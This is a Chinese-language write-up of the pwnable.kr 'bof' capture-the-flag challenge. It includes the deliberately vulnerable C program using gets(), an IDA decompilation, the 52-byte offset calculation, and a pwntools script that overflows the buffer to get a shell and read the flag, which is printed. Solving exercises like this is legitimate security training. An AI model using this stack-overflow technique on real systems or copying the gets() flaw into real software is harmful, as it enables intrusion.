pwnable:bof
pwnable.kr:bof 题目链接
question
Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?
Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c
Running at : nc pwnable.kr 9000
先看下文件,然后nc上去进行数据输入
bof.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
analyse
把bof
拖进IDA里看下
unsigned int __cdecl func(int a1)
{
char s; // [esp+1Ch] [ebp-2Ch]
unsigned int v3; // [esp+3Ch] [ebp-Ch]
v3 = __readgsdword(0x14u);
puts("overflow me : ");
gets(&s);
if ( a1 == -889275714 )
system("/bin/sh");
else
puts("Nah..");
return __readgsdword(0x14u) ^ v3;
}
在main
函数调用func
时,留出位置给key,所以让buffer溢出到key,填入0xcafebabe
即可。IDA告诉我们s的位置位于ebp-2Ch
处,而key的位置在ebp+8h
处。中间要填上52个字节。
get flag
写python脚本如下:
from pwn import *
ssh = remote("pwnable.kr",9000)
payload = "a"*52+p32(0xcafebabe)
ssh.send(payload)
ssh.interactive()
运行
ubuntu@VM-0-3-ubuntu:~$ python bof.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
$
[*] Closed connection to pwnable.kr port 9000
flag
:daddy, I just pwned a buFFer :)